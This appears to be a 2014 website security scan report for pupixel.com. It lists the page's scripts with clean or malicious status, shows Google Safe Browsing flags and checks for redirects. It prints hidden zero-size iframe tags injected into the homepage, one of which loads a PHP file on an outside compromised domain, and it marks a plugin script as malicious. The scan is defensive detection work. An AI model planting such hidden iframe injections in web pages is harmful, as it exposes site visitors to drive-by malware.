Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pupixel.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://pupixel.com/ | 200 OK Content-Length: 68058 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: analytics.pupixel.com var _paq = _paq || []; _paq.push(["setDocumentTitle", document.domain + "/" + document.title]); _paq.push(["setCookieDomain", "*.pupixel.com"]); _paq.push(["setDomains", ["*.pupixel.com"]]); _paq.push(["trackPageView"]); _paq.push(["enableLinkTracking"]); (function() { var u=(("https:" == document.location.protocol) ? "https" : "http") + "://analytics.pupixel.com/"; _paq.push(["setTrackerUrl", u+"piwik.php"]); _paq.push(["setSiteId", "1"]); var d=document, g=d.createElement("script"), s=d.getElementsByTagName("script")[0]; g.type="text/javascript"; g.defer=true; g.async=true; g.src=u+"piwik.js"; s.parentNode.insertBefore(g,s); })(); Hidden iFrame found. size: 0x0 src: http://phoenix-credit.com/wp-content/cache.php <iframe src="http://phoenix-credit.com/wp-content/cache.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no> Hidden iFrame found. size: 0x0 src: http://google.com <iframe src="http://google.com" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no> | ||
http://code.jquery.com/jquery-latest.js | 200 OK Content-Length: 282766 Content-Type: application/x-javascript | clean |
http://pupixel.com/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/javascript | clean |
http://pupixel.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://pupixel.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?ver=4.1 | 200 OK Content-Length: 83792 Content-Type: application/javascript | clean |
http://pupixel.com/wp-content/plugins/abg-rich-pins/js/abg-rich-pins.js?ver=4.1 | 200 OK Content-Length: 3292 Content-Type: application/javascript | clean |
http://pupixel.com/wp-content/plugins/g-lock-double-opt-in-manager/js/glock2.min.js | 200 OK Content-Length: 69612 Content-Type: application/javascript | clean |
http://pupixel.com/wp-content/plugins/g-lock-double-opt-in-manager/js/gsom_s.min.js | 200 OK Content-Length: 4054 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function gsom_isEmail(a){return a.match(/\b([_a-z0-9-]+(\.[_a-z0-9-]+)*)@([_a-z0-9-]+(\.[_a-z0-9-]+)*)(\.([a-z]{2,10}))\b/gi)}function gsmoStripSymbols(a){return a.replace(/[\s]+/g,"_").replace(/[^A-Za-z0-9\_]+/g,"").substring(0,20)}function gsomBuildForm(e){e=e||{};var b=e.arr||[],d=e.place||"gsom-fields-list",a=e.makeDivs||false,c=a?"div":"li";if(glock.isDef(b)){for(var f=0;f<b.length;f++){MakeFormFieldListItem({ul:d,label:b[f].label,type:b[f].type,value:b[f].value,name:b[f].name,checked:b[ Antivirus reports:
| ||
http://connect.facebook.net/en_US/all.js | 200 OK Content-Length: 160503 Content-Type: application/x-javascript | clean |
http://connect.facebook.net/it_IT/all.js | 200 OK Content-Length: 160508 Content-Type: application/x-javascript | clean |
https://apis.google.com/js/plusone.js | 200 OK Content-Length: 12798 Content-Type: application/javascript | clean |
http://platform.twitter.com/widgets.js | 200 OK Content-Length: 110239 Content-Type: application/javascript | clean |
http://assets.pinterest.com/js/pinit.js | 200 OK Content-Length: 319 Content-Type: application/javascript | clean |
http://pupixel.com/wp-includes/js/thickbox/thickbox.js?ver=3.1-20121105 | 200 OK Content-Length: 12206 Content-Type: application/javascript | clean |
http://pupixel.disqus.com/count.js?ver=4.1 | HTTP/1.1 302 Found Cache-Control: public, max-age=3600 Connection: close Date: Fri, 26 Dec 2014 07:54:34 GMT Accept-Ranges: bytes Location: http://a.disquscdn.com/count.js Server: Varnish Content-Length: 0 | clean |
http://a.disquscdn.com/count.js | 200 OK Content-Length: 1528 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pupixel.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 07:54:28 GMT
Content-Type: text/html; charset=UTF-8
X-Pingback: http://pupixel.com/xmlrpc.php
GET / HTTP/1.1
Host: pupixel.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 07:54:28 GMT
Content-Type: text/html; charset=UTF-8
X-Pingback: http://pupixel.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: pupixel.com
Referer: http://www.google.com/search?q=pupixel.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: pupixel.com
Referer: http://www.google.com/search?q=pupixel.com
Result:
The result is similar to the first query. There are no suspicious redirects found.